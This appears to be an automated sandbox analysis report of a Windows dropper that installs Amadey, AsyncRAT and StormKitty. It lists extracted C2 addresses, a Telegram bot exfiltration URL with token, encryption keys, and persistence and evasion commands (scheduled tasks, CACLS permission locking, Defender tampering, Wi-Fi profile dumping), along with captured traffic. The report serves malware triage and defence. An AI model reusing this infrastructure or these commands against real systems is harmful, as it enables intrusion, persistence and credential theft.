Analysis

  • max time kernel
    158s
  • max time network
    176s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    07/10/2023, 12:01 UTC

General

  • Target

    NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe

  • Size

    851KB

  • MD5

    332be1fd1afc1ede533225df48f347a6

  • SHA1

    ab007191fcbe1bcf3ac12ae4e02b52be4021b386

  • SHA256

    56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674

  • SHA512

    15d2762fdfe564103f6d5f20ec7e83b3861374b9d300abbe25b776876637ca819ffa7f4a7a24d113e7069e9ab6b8ecb3791d3ec2df6bab5495c24e0ff8eaf684

  • SSDEEP

    24576:Lyokio090afwEzoDl/ueBan7URNlto0O6HId9ASfyu:+cIafRzoFBan7URNbo0xoPL

Malware Config

Extracted

Family

amadey

Version

3.89

C2

http://77.91.124.1/theme/index.php

http://77.91.68.78/help/index.php

Attributes
  • install_dir

    fefffe8cea

  • install_file

    explothe.exe

  • strings_key

    36a96139c1118a354edf72b1080d4b2f

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d
rc4.plain
1
a091ec0a6e22276a96a99c1d34ef679c

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot6415420186:AAFl1R3-Kr5zbvKkeofTPjxvxd9leZKNs2M/sendMessage?chat_id=940609421

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detected google phishing page
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 5 IoCs
  • Async RAT payload 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Drops desktop.ini file(s) 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 62 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3064
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cK5xf37.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cK5xf37.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pc7OS86.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pc7OS86.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:2816
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\yt3Dp39.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\yt3Dp39.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:2644
          • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\to4uY17.exe
            C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\to4uY17.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:2080
            • C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1aN73RF8.exe
              C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1aN73RF8.exe
              6⤵
              • Modifies Windows Defender Real-time Protection settings
              • Executes dropped EXE
              • Loads dropped DLL
              • Windows security modification
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2756
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Ia413Ie.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Ia413Ie.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:904
          • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
            "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2444
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
              6⤵
              • Creates scheduled task(s)
              PID:2760
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
              6⤵
                PID:560
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "explothe.exe" /P "Admin:N"
                  7⤵
                    PID:1332
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    7⤵
                      PID:1068
                    • C:\Windows\SysWOW64\cacls.exe
                      CACLS "explothe.exe" /P "Admin:R" /E
                      7⤵
                        PID:1996
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        7⤵
                          PID:556
                        • C:\Windows\SysWOW64\cacls.exe
                          CACLS "..\fefffe8cea" /P "Admin:N"
                          7⤵
                            PID:1688
                          • C:\Windows\SysWOW64\cacls.exe
                            CACLS "..\fefffe8cea" /P "Admin:R" /E
                            7⤵
                              PID:544
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                            6⤵
                            • Loads dropped DLL
                            PID:2168
                    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5nT1Fl7.exe
                      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5nT1Fl7.exe
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:1656
                      • C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe
                        "C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Modifies system certificate store
                        PID:1440
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legota.exe /TR "C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe" /F
                          5⤵
                          • Creates scheduled task(s)
                          PID:2208
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legota.exe" /P "Admin:N"&&CACLS "legota.exe" /P "Admin:R" /E&&echo Y|CACLS "..\cb378487cf" /P "Admin:N"&&CACLS "..\cb378487cf" /P "Admin:R" /E&&Exit
                          5⤵
                            PID:588
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              6⤵
                                PID:2240
                              • C:\Windows\SysWOW64\cacls.exe
                                CACLS "legota.exe" /P "Admin:N"
                                6⤵
                                  PID:620
                                • C:\Windows\SysWOW64\cacls.exe
                                  CACLS "legota.exe" /P "Admin:R" /E
                                  6⤵
                                    PID:2128
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    6⤵
                                      PID:2204
                                    • C:\Windows\SysWOW64\cacls.exe
                                      CACLS "..\cb378487cf" /P "Admin:N"
                                      6⤵
                                        PID:1448
                                      • C:\Windows\SysWOW64\cacls.exe
                                        CACLS "..\cb378487cf" /P "Admin:R" /E
                                        6⤵
                                          PID:2464
                                      • C:\Users\Admin\AppData\Local\Temp\1000106101\pf1sbMGHARiKj7J.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000106101\pf1sbMGHARiKj7J.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2328
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hxUzPGlXoN" /XML "C:\Users\Admin\AppData\Local\Temp\tmp166E.tmp"
                                          6⤵
                                          • Creates scheduled task(s)
                                          PID:1564
                                        • C:\Users\Admin\AppData\Local\Temp\1000106101\pf1sbMGHARiKj7J.exe
                                          "{path}"
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Drops desktop.ini file(s)
                                          • Checks processor information in registry
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2340
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                            7⤵
                                              PID:1536
                                              • C:\Windows\SysWOW64\chcp.com
                                                chcp 65001
                                                8⤵
                                                  PID:1736
                                                • C:\Windows\SysWOW64\netsh.exe
                                                  netsh wlan show profile
                                                  8⤵
                                                    PID:928
                                                  • C:\Windows\SysWOW64\findstr.exe
                                                    findstr All
                                                    8⤵
                                                      PID:1348
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                    7⤵
                                                      PID:432
                                                      • C:\Windows\SysWOW64\chcp.com
                                                        chcp 65001
                                                        8⤵
                                                          PID:3060
                                                        • C:\Windows\SysWOW64\netsh.exe
                                                          netsh wlan show networks mode=bssid
                                                          8⤵
                                                            PID:2252
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                                      5⤵
                                                      • Loads dropped DLL
                                                      PID:1616
                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Es4UL91.exe
                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Es4UL91.exe
                                                2⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:1880
                                                • C:\Windows\system32\cmd.exe
                                                  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\24DF.tmp\24E0.tmp\24E1.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Es4UL91.exe"
                                                  3⤵
                                                    PID:1116
                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login
                                                      4⤵
                                                      • Modifies Internet Explorer settings
                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:880
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:880 CREDAT:275457 /prefetch:2
                                                        5⤵
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2672
                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                      "C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/
                                                      4⤵
                                                      • Modifies Internet Explorer settings
                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1700
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1700 CREDAT:275457 /prefetch:2
                                                        5⤵
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:3056
                                              • C:\Windows\system32\taskeng.exe
                                                taskeng.exe {B782FBBE-91B3-439C-B43B-C5E060347BB7} S-1-5-21-686452656-3203474025-4140627569-1000:UUVOHKNL\Admin:Interactive:[1]
                                                1⤵
                                                  PID:1940
                                                  • C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe
                                                    C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:1036
                                                  • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
                                                    C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:2668
                                                  • C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe
                                                    C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:2476
                                                  • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
                                                    C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:1016

                                                Network

                                                • flag-us
                                                  DNS
                                                  accounts.google.com
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  accounts.google.com
                                                  IN A
                                                  Response
                                                  accounts.google.com
                                                  IN A
                                                  142.250.179.141
                                                • flag-nl
                                                  GET
                                                  https://accounts.google.com/_/bscframe
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  142.250.179.141:443
                                                  Request
                                                  GET /_/bscframe HTTP/1.1
                                                  Accept: text/html, application/xhtml+xml, */*
                                                  Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glif
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: accounts.google.com
                                                  Connection: Keep-Alive
                                                  Cookie: __Host-GAPS=1:zQOEd9Ck8mHA3JEzT3AO6zDTCgsXiQ:NmRGDLtEvx9qtb7I; OTZ=7239603_56_56__56_
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: text/html; charset=utf-8
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                  X-Frame-Options: SAMEORIGIN
                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                  Pragma: no-cache
                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Content-Security-Policy: script-src 'unsafe-eval';require-trusted-types-for 'script';object-src 'none'
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInSignUpUi"
                                                  Report-To: {"group":"AccountsSignInSignUpUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInSignUpUi"}]}
                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                  Cross-Origin-Resource-Policy: same-site
                                                  Content-Encoding: gzip
                                                  Server: ESF
                                                  X-XSS-Protection: 0
                                                  X-Content-Type-Options: nosniff
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Transfer-Encoding: chunked
                                                • flag-nl
                                                  GET
                                                  https://accounts.google.com/generate_204?XYk76A
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  142.250.179.141:443
                                                  Request
                                                  GET /generate_204?XYk76A HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glif
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: accounts.google.com
                                                  Connection: Keep-Alive
                                                  Cookie: __Host-GAPS=1:QFaHwjs9ga-wkO4VCW93ou4T_nMKPQ:DVaG1eu79sSL7fOr; OTZ=7239603_56_56__56_
                                                  Response
                                                  HTTP/1.1 204 No Content
                                                  Content-Length: 0
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                • flag-nl
                                                  GET
                                                  https://accounts.google.com/
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  142.250.179.141:443
                                                  Request
                                                  GET / HTTP/1.1
                                                  Accept: text/html, application/xhtml+xml, */*
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: accounts.google.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 302 Moved Temporarily
                                                  Content-Type: text/html; charset=UTF-8
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                  Set-Cookie: __Host-GAPS=1:0XeHgSNK9aL72BFfHCcdoTGNRzS1VQ:dNVuGHZibg56z1f8;Path=/;Expires=Mon, 06-Oct-2025 12:02:45 GMT;Secure;HttpOnly;Priority=HIGH
                                                  X-Frame-Options: DENY
                                                  Content-Security-Policy: script-src 'nonce-DMx8fZqE0AAPf0vJr61_iw' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
                                                  Location: https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
                                                  Content-Encoding: gzip
                                                  Date: Sat, 07 Oct 2023 12:02:45 GMT
                                                  Expires: Sat, 07 Oct 2023 12:02:45 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Transfer-Encoding: chunked
                                                • flag-nl
                                                  GET
                                                  https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  142.250.179.141:443
                                                  Request
                                                  GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/1.1
                                                  Accept: text/html, application/xhtml+xml, */*
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: accounts.google.com
                                                  Connection: Keep-Alive
                                                  Cookie: __Host-GAPS=1:0XeHgSNK9aL72BFfHCcdoTGNRzS1VQ:dNVuGHZibg56z1f8
                                                  Response
                                                  HTTP/1.1 302 Found
                                                  Content-Type: application/binary
                                                  Set-Cookie: __Host-GAPS=1:zQOEd9Ck8mHA3JEzT3AO6zDTCgsXiQ:NmRGDLtEvx9qtb7I; Expires=Mon, 06-Oct-2025 12:02:46 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                  Pragma: no-cache
                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Location: https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhd6Gg-ZZ8gnsrUFC39V_x7p34dPx0Lceo6Ly424wLygzYagAEShxXndyTyKJ4yjC6zwmnSM
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                  Content-Security-Policy: script-src 'nonce-NsCoCatG9OGZCIdT_f22KA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self'
                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport
                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  Cross-Origin-Opener-Policy: unsafe-none
                                                  Server: ESF
                                                  Content-Length: 0
                                                  X-XSS-Protection: 0
                                                  X-Content-Type-Options: nosniff
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                • flag-nl
                                                  GET
                                                  https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhd6Gg-ZZ8gnsrUFC39V_x7p34dPx0Lceo6Ly424wLygzYagAEShxXndyTyKJ4yjC6zwmnSM
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  142.250.179.141:443
                                                  Request
                                                  GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhd6Gg-ZZ8gnsrUFC39V_x7p34dPx0Lceo6Ly424wLygzYagAEShxXndyTyKJ4yjC6zwmnSM HTTP/1.1
                                                  Accept: text/html, application/xhtml+xml, */*
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: accounts.google.com
                                                  Connection: Keep-Alive
                                                  Cookie: __Host-GAPS=1:zQOEd9Ck8mHA3JEzT3AO6zDTCgsXiQ:NmRGDLtEvx9qtb7I
                                                  Response
                                                  HTTP/1.1 302 Moved Temporarily
                                                  Content-Type: text/html; charset=UTF-8
                                                  X-Frame-Options: DENY
                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                  Pragma: no-cache
                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glif
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                  Content-Security-Policy: script-src 'nonce-lJig2Y2BMVNOc2zLRm23PA' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
                                                  Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                  Content-Encoding: gzip
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Transfer-Encoding: chunked
                                                • flag-nl
                                                  GET
                                                  https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glif
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  142.250.179.141:443
                                                  Request
                                                  GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glif HTTP/1.1
                                                  Accept: text/html, application/xhtml+xml, */*
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: accounts.google.com
                                                  Connection: Keep-Alive
                                                  Cookie: __Host-GAPS=1:zQOEd9Ck8mHA3JEzT3AO6zDTCgsXiQ:NmRGDLtEvx9qtb7I
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: text/html; charset=utf-8
                                                  X-Frame-Options: DENY
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                  x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
                                                  x-ua-compatible: IE=edge
                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                  Pragma: no-cache
                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
                                                  Content-Security-Policy: script-src 'nonce-W3xKhK7oh4hqoThh_gqnGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
